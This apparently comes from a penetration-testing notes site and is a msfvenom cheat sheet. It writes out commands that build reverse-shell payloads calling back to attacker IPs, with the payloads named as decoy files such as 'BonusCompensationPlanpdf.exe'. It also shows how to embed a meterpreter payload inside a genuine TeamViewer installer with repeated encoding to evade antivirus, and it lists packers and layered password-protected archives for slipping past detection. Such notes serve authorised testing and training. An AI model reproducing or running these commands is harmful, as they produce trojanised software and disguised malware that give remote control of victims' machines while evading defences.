msfvenom

Listing Payloads

msfvenom -l payloads

Staged vs Stageless payloads

windows/meterpreter/reverse_tcp vs windows/meterpreter_reverse_tcp

The former is staged, after the architecture each / is a stage. The latter doesn't have a / after the meterpreter part, so it's stageless

Creating a payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf

  • -p build payload

  • -f output format

List options

msfvenom -p java/jsp_shell_reverse_tcp --list-options

Basic msfvenom

msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>

One can also use the -a to specify the architecture or the --platform Listing

msfvenom -l payloads #Payloads
msfvenom -l encoders #Encoders

Common params when creating a shellcode

-b "\x00\x0a\x0d" 
-f c 
-e x86/shikata_ga_nai -i 5 
EXITFUNC=thread
PrependSetuid=True #Use this to create a shellcode that will execute something with SUID

Encoding

-b "\x00" -e x86/shikata_ga_nai

  • -b for bad bytes

  • -e encoding

Antivirus evasion

Hiding payload inside of legitimate executables

msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5

  • -i iterations of encoding

  • -k continue with normal execution

  • -x input file to embed the payload into

  • -o output file

Archiving

use multiple zip/rar/compression layers with passwords to evade detection on the network

Packing

A list of popular packer software:

UPX packer

The Enigma Protector

MPRESS

Alternate EXE Packer

ExeStealth

Morphine

MEW

Themida

Also see PolyPack.

PreviousMetasploitNextPrivilege Escalation

Last updated